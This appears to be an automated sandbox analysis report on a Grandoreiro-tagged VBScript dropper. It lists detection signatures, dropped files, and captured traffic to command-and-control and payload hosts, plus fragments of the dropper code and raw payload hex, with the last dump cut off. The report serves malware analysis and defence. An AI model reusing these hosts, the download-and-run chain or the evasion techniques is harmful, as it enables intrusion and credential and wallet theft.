Windows Analysis Report
672365339196e.vbs

Overview

General Information

Sample name:	672365339196e.vbs
Analysis ID:	1546041
MD5:	67c2e775c3447ed3cd210f615ad84ac5
SHA1:	117163fbe969960166af9d68f519cf975aa223c8
SHA256:	f8520d764363ff22784c2bd6f77829ffe7396637936d68855bf56ae1f0c6dd5e
Tags:	geoGrandoreiroMEXPRTvbsuser-NDA0E
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Multi AV Scanner detection for dropped file

System process connects to network (likely due to code injection or exploit)

VBScript performs obfuscated calls to suspicious functions

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Excessive usage of taskkill to terminate processes

Overwrites code with function prologues

Potential malicious VBS script found (has network functionality)

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Tries to access browser extension known for cryptocurrency wallets

Uses ipconfig to lookup or modify the Windows network settings

Uses known network protocols on non-standard ports

Uses ping.exe to check the status of other devices and networks

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Script Initiated Connection

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Keylogger Generic

Classification

Signatures

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\hcx.dll

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 83.6% probability

Source: BLOCKBUSTER.exe, 0000000E.00000002.2393941031.0000000008AC0000.00000020.00000001.01000000.0000000B.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_b46a6645-7

Source: unknown

HTTPS traffic detected: 68.65.122.45:443 -> 192.168.2.6:49712 version: TLS 1.2

Source:	Binary string: wkernel32.pdb source: BLOCKBUSTER.exe, 0000000E.00000003.2349989495.000000000D5C4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: BLOCKBUSTER.exe, 0000000E.00000002.2569344059.000000006FCF5000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wkernel32.pdbUGP source: BLOCKBUSTER.exe, 0000000E.00000003.2349989495.000000000D5C4000.00000004.00001000.00020000.00000000.sdmp

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCDC2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,

14_2_6FCDC2D0

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\curl.exe

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 64.95.10.38 80

Jump to behavior

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 70.34.247.142 ports 0,2,3,443,5,2530

Potential malicious VBS script found (has network functionality)

Source: C:\Windows\System32\curl.exe	Dropped file: adodbStream.Write xmlhttp.ResponseBody			Jump to dropped file
Source: C:\Windows\System32\curl.exe	Dropped file: adodbStream.SaveToFile destinationFolder & "\downloaded.zip", 2			Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49950

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49809 -> 70.34.247.142:2530

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: aaGv8t/cYOIYaK+ezrdpkg==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: 0JzSPu5zfi7XAIhfH96wSg==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: NQjoum4smcb9bygYQEmS8Q==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: POST /$rdgate?ACTION=HELLO HTTP/1.1HOST: TGB5255365E.SERVEGAME.COMCONTENT-LENGTH: 7249Data Raw: 30 0b ec 98 81 56 fc b8 db a2 a5 49 11 86 e7 02 62 f6 df 15 bb b3 55 56 0e 7f 00 0e 13 0c ff 09 c7 53 1e 71 e3 41 50 1e 0e 46 b7 88 fc 57 3a d3 b9 cf 2e c3 0a fe 15 3e 61 d3 6b a5 f1 34 10 b2 75 a1 ec 35 ba c5 de a3 b9 17 be 72 81 53 bc bc 48 91 cb 22 6d 37 18 73 50 87 cc 3b bc 91 81 e7 1a c8 67 c5 50 79 cb 75 c2 52 ac da 99 ef 9a 40 48 e7 cf 2e 97 5e a8 b9 8b b7 1d ed 8c 76 94 b5 a4 b9 89 38 bb af 11 bd b9 f6 05 f9 c2 7f 34 ba 11 09 31 9a 42 ac a6 85 e3 67 72 51 a2 a7 d1 b9 8e 95 5f c4 f9 c1 6a de ca 04 eb 5f 7c 79 ed 7d 96 85 27 29 d1 c9 af 25 a1 d3 34 21 26 ea e8 01 42 88 6a 4c 95 df c7 2f e2 28 ef d8 5f 75 45 2c 95 f1 ec 26 b3 c8 23 d0 ab 18 95 17 77 8f 8f 7b e8 5b e2 47 db a7 a4 6a eb b4 37 74 7b f8 22 4f ae a2 82 b7 32 a4 fb dd ec 19 7b 0f 7e 15 24 39 95 7a c6 f4 c4 f2 d7 ba 53 0b 49 a9 2c 00 89 5d 1f 07 03 30 75 e9 f3 81 64 e2 c0 85 41 fc 70 3e 47 bd 41 61 0e 56 bf bf 83 1c 9f e4 d7 69 a7 6a e9 96 30 b5 c1 38 1b 68 52 4e 37 99 32 99 36 55 57 7b f9 d8 cc 2a 73 f8 27 70 f5 3c 55 5c f4 02 32 9d 95 c1 e0 f4 6b d5 5d 53 e1 93 7d a0 d2 cb 95 5c d8 8b ab 41 51 0b b3 79 4e 42 a9 ff ba c3 87 b5 81 29 b4 b6 a4 e7 40 b2 05 e9 f0 28 23 f2 bc b8 e3 a0 fd 0d b5 a2 92 c8 19 fb e7 13 8b 65 7e 7d eb 2e cf 55 2b ff 6b 50 ca 0f e4 37 5f e7 88 07 95 fc c2 4e e2 fb e5 1f c0 21 34 88 b2 21 d2 35 0d d4 6c 4d db 9c 49 13 5a 52 d1 df 48 06 c0 c5 99 67 99 44 76 98 34 df b8 16 11 0b ee e4 4e 29 89 39 03 6c c0 8b b4 ba a0 95 3d c7 16 13 ef 32 01 dd fb 20 7e 27 bd 3b 7c 0e 78 68 a0 26 8b 2d eb 50 6c 17 c2 c2 0d 17 c4 99 10 50 ca 5e 84 0b 8e f2 e9 79 20 c7 81 ef c6 f7 9b 0f 71 26 41 74 3f 9a a7 1b 82 98 56 f0 df d2 37 cf ea 93 7d 43 89 66 4e a3 43 0b f4 da ec 44 ad d6 d2 5d 31 32 79 77 01 b7 7d cd a9 1c 9d 7b 1f b1 ef 38 21 b3 37 9c 17 a3 cb 22 af 76 91 ee 2c e8 b1 7a 52 0d 89 4b 08 1c e2 b1 a2 f4 c6 fb 8b 45 31 86 9b a0 1b c1 7a f0 fb 2f 5d 4e 8b 54 57 3a d4 29 ab 26 d8 58 01 a4 2a d8 35 a2 4e 60 fc 36 92 d3 9d 23 2c 8c a3 de 43 65 75 3f 54 b3 ff cb d2 b4 38 31 d5 67 26 89 96 93 ca 73 7f 35 a5 3c 78 f8 c0 e9 bd 15 ce 1e 79 89 ff ac 8c a8 9a a1 ec 5b 79 39 74 da bb 54 9f 02 c6 e0 c4 b1 7a f4 4e 53 ba 5f 85 08 96 1c 86 5b 62 90 03 06 c2 9e 68 ca 46 96 7d d6 be 81 27 40 e9 03 26 16 38 87 40 43 0f a9 ff 83 ce 00 99 6e 27 60 e6 af f9 5d c7 56 9f 42 e7 ec 71 f2 0c b4 b5 da a0 b7 4c 0a 84 99 36 43 2b 11 c2 56 a8 71 1a e4 42 fe ab a0 90 de 2d 32 22 45 fe a3 e7 3f 80 a2 46 96 5a ff 17 09 b9 14 0f 33 46 f7 8d 99 d7 ce e1 98 e5 d1 df ff 5c 26 57 53 88 11 8d cd ef 5d a0 29 76 1b a4 6b ff b8 c3 ab 50 3e 8c 8d 50 4f 51 b6 45 93 b7 ba 4c db db 37 a2 65 41 0f 83 c9 69 7d d9 e1 c6 45 5b c3 ec 57 91 94 9e ea 20 b5 13 14 5d 20 86 52 38 ce 44 3f 78 ba 4e 7b 87 be ef 5c cf ef b3 bd b6 14 7c 75 a8 19 ea a1 33 60 91 3d 47 44 48 8f 1c a1 99 70 9e 17 cd ee 1c 34 d3 c3 9f 3f c2 39 7d 70 fc d2 5a 3c 78 df 36 3f 54 02 4d 31 ae 85 08 35 be 5d 87 fc 98 8b 5d e1 56 be 00 a2 2f 77 8c 75 9e e3 3b f5
Source: global traffic	HTTP traffic detected: POST /$rdgate?ACTION=HELLO HTTP/1.1HOST: TGB5255365E.SERVEGAME.COMCONTENT-LENGTH: 7247Data Raw: 47 14 1b b1 ff f4 ff 33 eb d0 02 71 0d 37 73 ed 6b 0a 38 7a c6 dd 9f 86 77 64 ac bf 7c bc 6d 89 a0 97 97 42 64 8a 55 cf 67 b5 62 7f 33 36 ee 07 c9 f0 6c 82 72 58 cc 80 39 ae ca 81 10 c2 51 cd 8b 59 a0 af cf 7a 4a ea 56 8c a3 fe 62 3f cc 07 e0 1d fe e3 e2 50 f8 ce ee 9e 1c ef ad c6 a4 07 c5 ce 82 84 79 d0 db c4 27 5e 12 74 5e ef ca b1 b7 65 93 b8 ad 6f 6f 7c c8 89 4d 4c dd 8e db e8 fe d3 2c 48 f8 b9 ac 88 e9 d9 09 c7 44 21 2e 6b a4 9f d4 eb 13 0a 8a 02 61 2c 7b 3f 11 ae 52 28 fc 92 52 e8 ed 44 a5 fc bb a7 92 c3 06 81 98 0e c2 1f 2c fd 11 3a b2 6a e1 70 64 be df 95 0c ba b6 fe 08 56 d6 5e 25 d1 61 13 bb b3 22 35 ce eb 0e 68 35 fe 2f ce 08 11 8e ab 2a f0 f4 3f 0a 7f f2 c2 1c c4 85 a6 ed 30 e1 43 36 b9 37 b9 00 70 74 67 bd e0 d5 e9 89 9a 7b 53 0c dc 5d 7b 79 00 a7 d2 45 d3 55 20 b2 91 34 a8 ed ad 19 1d 20 ea 51 31 ed 56 d0 57 b7 7f ae 58 34 66 38 23 67 cf 9f a1 8b 52 f1 52 8a a4 0d 12 a0 b2 b8 df a7 5f cc f2 ae 56 08 27 5e a5 5d fa 7e 76 ed 46 a0 81 e9 bf 30 34 3d 2e 07 f5 35 79 43 9b 44 a8 06 98 b1 33 99 5e 90 f6 f7 23 9c ac 6e 37 00 38 8a b2 12 ae fa 36 3f 1a d7 ff 9f 0b a9 9d 78 f6 65 c0 68 d2 64 e0 2d 00 98 7d 59 c2 7f f3 5f a0 e4 08 2f 39 23 2d c1 26 ed 3c a5 52 0d 8d 5a 7c 12 7f ca 3f e1 15 5b 71 38 37 99 69 c0 47 fe 41 fd a1 2a 5a 6c 98 6d fc a9 22 84 69 75 34 36 66 dd 05 9a cb e0 8e 60 14 3e 80 19 b3 a4 ba 39 c3 dc f7 39 84 da 12 2c 70 1f 18 3e ae d1 cb d8 45 8d 5d 6f c8 07 69 9e 46 65 ff aa 88 3f f6 83 30 32 be 65 76 3c 09 9c 18 4e 4c bf 9a 07 57 55 15 4f c5 83 20 c1 c5 70 4f c2 c1 68 54 8b c0 a5 0c db be 04 6f d1 02 6f 7d 15 72 2f 94 22 b9 9d 82 00 fa 6c cf 84 f4 1d 45 3b 59 12 f0 f8 f9 ea 8b 36 34 43 12 7c fa 3e a4 72 5d 2b f1 60 12 d2 85 4a ee 55 26 ca 34 68 8b 97 16 21 28 df 82 52 3e c3 b9 b4 75 f8 d0 b9 e2 07 46 15 ee 74 2f 59 af 55 16 ba 5c f8 34 d6 1d 50 6b 78 27 21 0b 27 71 d2 bc e3 03 74 a3 5e 10 e1 42 15 bd 65 7a 89 0c 9a ba 26 ec b4 7b 8e b7 9b e3 51 29 1f 30 8f 6b 73 43 83 f6 e7 f7 5c 0f ad 1d 67 08 1b 49 7d ca 13 d6 57 32 b3 d5 4b be da 92 93 0c 50 5e 71 56 8f 0a 3b 2a 2e 8c 5d 8b d7 c6 d5 85 6f bb 2a df 5c 0c e0 5c 62 b3 53 81 41 cc 54 0c 1e 4a 26 23 a2 60 1b c0 20 ca 0d be f3 94 96 59 5f 8f b2 c7 2b 0b 1e 9d f0 89 a9 8a 7d 55 48 e9 09 f0 f2 eb 6c 70 96 a6 c7 97 57 9e 27 5b 17 97 ba 8f 29 60 38 02 ad 9f 9d 4c 7c fe 31 a8 9a fa a1 9c 1e ff 0b 7c 2a 86 44 65 86 e0 1e ab 0c 83 57 ce 40 1f 4b 39 c6 a0 31 a9 0e 04 ed 75 a4 94 35 06 f0 22 46 fe 0f 03 ff ce 65 34 20 0a bc a4 eb c8 9e cb 37 22 da 40 29 71 31 e7 5e 7a 8a 84 a4 8f ce 14 a4 5c 04 12 26 40 7f 76 0f 8a 2a 1e fd 97 4b d7 fc 96 c8 f9 77 a9 6b 7e 0c db a4 a7 3a 66 f6 47 92 7b 3f 3d b8 78 fd 8a 28 0c 4f 00 a6 3b 7a 1a 98 8c c4 b9 05 4a 74 6c 68 e1 a8 a2 43 fe 4a 6d ef 88 00 0f dc 6d 5a 24 83 af 81 0d 6a 5c bb d1 3c 72 d0 f5 46 42 35 f3 84 7e 40 40 c8 54 e7 d4 64 db 1b 55 3a 17 03 f6 1d 4e cc 41 fa a5 4f 6c 7d bf d6 7e 45 c1 fb 7f 84 52 96 e3 6d 44 08 c1 55 90 8d 61 8b 56 44 2f

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 213.188.196.246 213.188.196.246
Source: Joe Sandbox View	IP Address: 213.188.196.246 213.188.196.246

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: RAZOR-PHLUS RAZOR-PHLUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49778
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:49973

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /wewewe.zip HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.95.10.38Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /contador/index.php?nomepc=user-PC HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.95.10.38Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Oct 2024 11:18:01 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Wed, 30 Oct 2024 18:47:01 GMTETag: "2645abd-625b62099d32f"Accept-Ranges: bytesContent-Length: 40131261Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 50 4b 03 04 14 00 00 00 08 00 2f 7c e6 3a d8 e1 df 30 3f 7d 01 00 00 b8 02 00 09 00 00 00 75 6e 72 61 72 2e 64 6c 6c ec fd 7d 7c 54 c5 f5 38 8e df 7d 48 b2 90 25 77 81 0d ac 12 21 ca aa c1 44 0c 6c b4 81 0d 18 20 84 a8 11 77 f3 b0 8b 02 09 b6 36 4d 53 b4 16 76 03 d6 08 89 37 1b 72 33 5c c4 16 a8 7d d7 5a db aa 6f ac be 5b 6c 35 80 62 dc 4d 20 09 f2 0c 56 50 ac e2 f3 0d 0b 08 3e 40 78 dc df 39 67 ee 6e 36 01 fb e9 f7 fb fa 7c 3e bf df 1f bf c0 de 87 b9 33 67 ce 9c 39 73 e6 cc cc 99 33 77 df b7 5a 30 08 82 60 84 5f 24 22 08 9b 04 fe 97 2f fc af ff 7a e1 97 32 e6 f5 14 e1 d5 41 bb ae dd a4 2b de 75 6d 59 f5 4f 17 a7 3f bc e8 e7 3f 59 74 ff 83 e9 3f ba ff a1 87 7e ee 4b ff e1 8f d3 17 f9 1f 4a ff e9 43 e9 05 f7 94 a6 3f f8 f3 07 7e 3c 7e c8 90 c1 76 0d c6 ba ef 7a 2c fb d7 ac 98 11 fd ed ec 34 cc f8 90 ee c3 66 ec 80 fb e1 63 c6 19 0a bd 1b 67 bc 03 f7 ef 4a 2e cc 38 4c 71 9b 66 cc a7 ef 86 19 4f d3 3d 75 c6 01 8a 37 9c ee 87 8f 8d a0 7b c9 4f 7f 54 8d 70 07 e2 ee 9a 29 08 c5 ba 04 21 f4 57 e7 9d d1 b0 23 82 fe da 64 dd 20 41 c8 d1 0b 42 3d 0f 33 bd a9 13 04 0b 26 d0 e3 ab 85 9e e1 31 41 4b 63 8c 26 5e 60 a0 97 0d 4b 0d f0 39 9f 27 b2 08 42 df 5d bb b5 e8 85 87 e1 eb 73 cb f5 82 0b df d3 0d 42 8e 51 b8 fc 2f db 20 34 0f 87 5b 89 5e 48 13 be ff ef e1 9f eb fb d7 15 e0 f9 8e ee fb e3 8f f7 fd 78 a9 0f ef 0e 3d 47 08 cb 3a 20 ff 74 28 cd f8 45 0f dc ef bb 1f e0 3b b5 b2 e7 c1 3d 57 1f 1f 0d f3 cd 1f cf a3 09 75 48 af d5 f0 dd 06 77 df 65 f1 82 e3 17 2d 5e f4 23 cc ce c8 cb 2c 24 c2 7d e5 15 e0 2d fa f1 c2 9f 43 c4 61 76 4e 03 e1 06 b8 ff ea b2 78 d3 85 ff ff df ff 96 3f 56 66 37 4e 0c d6 4f 2e f1 b0 53 fe 3b 5b ee d4 d5 9f 9d e9 b7 d5 ff 52 bf cc 3f ac fe 97 86 0a bf 79 83 ae b9 e9 d9 47 04 a1 a2 dd 28 d4 9f bd df 7f 3d 7c 5c e4 1f 03 1f af f5 5f 55 ff 4b e3 d5 fe e1 f5 bf 4c 48 f2 0f c9 9d 9e e8 37 f1 b8 1b 74 18 7b 27 fc b1 86 a7 e1 9d 3d f9 14 5c 6b 04 57 89 fa d2 f3 82 d0 b1 33 f6 87 f9 2b d3 b2 5b 4c 93 07 fb ed 8d db 7d c3 5a 8a 74 93 ef d4 f9 6d 52 50 2f b5 eb 1b b7 fb 3f 73 04 1d db 03 41 71 4d a8 25 04 40 47 05 a5 43 91 f8 80 9d fd fe 58 81 dd 08 45 d1 15 1a d9 6c 23 2b 34 39 bb 6b 1d 6c 6f e8 a8 de ab d4 e9 d3 9d 7b 6a f5 ec 2c 4b 51 8c b7 bb dc ea 75 ab 74 82 b4 d5 24 27 06 82 fe c1 9b 17 be a1 b7 a8 f3 6b 05 41 5e 66 aa 8c a2 bf b3 63 e7 e5 f0 01 67 93 dc b0 c0 0b 51 9f 7c 00 ae 9d 0d 4b e1 2a b4 9b 20 09 e4 cd 12 bd 8e 88 b3 cb 97 ec 52 27 2a 98 83 51 9e 0a 30 e5 65 c6 ca 8a 8e 2b e0 97 7d 19 7e 89 5e 97 1a 50 2e 43 2e e8 1f 80 1c d1 37 db 2c 08 81 a0 2f c9 a5 6e 5d a9 13 ee 1d 80 70 4d a4 fa c8 24 bd e5 81 3f 62 65 bb a4 63 e9 a5 e5 1e ef 1f 85 df e8 2d 8e ad 2e a5 c0 9e f3 c0 9f 89 0d 4e 75 36 ad 87 2a 12 d4 f0 3

Source: global traffic	HTTP traffic detected: GET /672365339188b/6723653391970.vbs HTTP/1.1Host: endesa.clickUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wewewe.zip HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.95.10.38Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /contador/index.php?nomepc=user-PC HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.95.10.38Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: aaGv8t/cYOIYaK+ezrdpkg==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: 0JzSPu5zfi7XAIhfH96wSg==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: NQjoum4smcb9bygYQEmS8Q==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org

Source: global traffic	DNS traffic detected: DNS query: endesa.click
Source: global traffic	DNS traffic detected: DNS query: worldtimeapi.org
Source: global traffic	DNS traffic detected: DNS query: tgb5255365e.servegame.com

Source: unknown

HTTP traffic detected: POST /$rdgate?ACTION=HELLO HTTP/1.1HOST: TGB5255365E.SERVEGAME.COMCONTENT-LENGTH: 7249Data Raw: 30 0b ec 98 81 56 fc b8 db a2 a5 49 11 86 e7 02 62 f6 df 15 bb b3 55 56 0e 7f 00 0e 13 0c ff 09 c7 53 1e 71 e3 41 50 1e 0e 46 b7 88 fc 57 3a d3 b9 cf 2e c3 0a fe 15 3e 61 d3 6b a5 f1 34 10 b2 75 a1 ec 35 ba c5 de a3 b9 17 be 72 81 53 bc bc 48 91 cb 22 6d 37 18 73 50 87 cc 3b bc 91 81 e7 1a c8 67 c5 50 79 cb 75 c2 52 ac da 99 ef 9a 40 48 e7 cf 2e 97 5e a8 b9 8b b7 1d ed 8c 76 94 b5 a4 b9 89 38 bb af 11 bd b9 f6 05 f9 c2 7f 34 ba 11 09 31 9a 42 ac a6 85 e3 67 72 51 a2 a7 d1 b9 8e 95 5f c4 f9 c1 6a de ca 04 eb 5f 7c 79 ed 7d 96 85 27 29 d1 c9 af 25 a1 d3 34 21 26 ea e8 01 42 88 6a 4c 95 df c7 2f e2 28 ef d8 5f 75 45 2c 95 f1 ec 26 b3 c8 23 d0 ab 18 95 17 77 8f 8f 7b e8 5b e2 47 db a7 a4 6a eb b4 37 74 7b f8 22 4f ae a2 82 b7 32 a4 fb dd ec 19 7b 0f 7e 15 24 39 95 7a c6 f4 c4 f2 d7 ba 53 0b 49 a9 2c 00 89 5d 1f 07 03 30 75 e9 f3 81 64 e2 c0 85 41 fc 70 3e 47 bd 41 61 0e 56 bf bf 83 1c 9f e4 d7 69 a7 6a e9 96 30 b5 c1 38 1b 68 52 4e 37 99 32 99 36 55 57 7b f9 d8 cc 2a 73 f8 27 70 f5 3c 55 5c f4 02 32 9d 95 c1 e0 f4 6b d5 5d 53 e1 93 7d a0 d2 cb 95 5c d8 8b ab 41 51 0b b3 79 4e 42 a9 ff ba c3 87 b5 81 29 b4 b6 a4 e7 40 b2 05 e9 f0 28 23 f2 bc b8 e3 a0 fd 0d b5 a2 92 c8 19 fb e7 13 8b 65 7e 7d eb 2e cf 55 2b ff 6b 50 ca 0f e4 37 5f e7 88 07 95 fc c2 4e e2 fb e5 1f c0 21 34 88 b2 21 d2 35 0d d4 6c 4d db 9c 49 13 5a 52 d1 df 48 06 c0 c5 99 67 99 44 76 98 34 df b8 16 11 0b ee e4 4e 29 89 39 03 6c c0 8b b4 ba a0 95 3d c7 16 13 ef 32 01 dd fb 20 7e 27 bd 3b 7c 0e 78 68 a0 26 8b 2d eb 50 6c 17 c2 c2 0d 17 c4 99 10 50 ca 5e 84 0b 8e f2 e9 79 20 c7 81 ef c6 f7 9b 0f 71 26 41 74 3f 9a a7 1b 82 98 56 f0 df d2 37 cf ea 93 7d 43 89 66 4e a3 43 0b f4 da ec 44 ad d6 d2 5d 31 32 79 77 01 b7 7d cd a9 1c 9d 7b 1f b1 ef 38 21 b3 37 9c 17 a3 cb 22 af 76 91 ee 2c e8 b1 7a 52 0d 89 4b 08 1c e2 b1 a2 f4 c6 fb 8b 45 31 86 9b a0 1b c1 7a f0 fb 2f 5d 4e 8b 54 57 3a d4 29 ab 26 d8 58 01 a4 2a d8 35 a2 4e 60 fc 36 92 d3 9d 23 2c 8c a3 de 43 65 75 3f 54 b3 ff cb d2 b4 38 31 d5 67 26 89 96 93 ca 73 7f 35 a5 3c 78 f8 c0 e9 bd 15 ce 1e 79 89 ff ac 8c a8 9a a1 ec 5b 79 39 74 da bb 54 9f 02 c6 e0 c4 b1 7a f4 4e 53 ba 5f 85 08 96 1c 86 5b 62 90 03 06 c2 9e 68 ca 46 96 7d d6 be 81 27 40 e9 03 26 16 38 87 40 43 0f a9 ff 83 ce 00 99 6e 27 60 e6 af f9 5d c7 56 9f 42 e7 ec 71 f2 0c b4 b5 da a0 b7 4c 0a 84 99 36 43 2b 11 c2 56 a8 71 1a e4 42 fe ab a0 90 de 2d 32 22 45 fe a3 e7 3f 80 a2 46 96 5a ff 17 09 b9 14 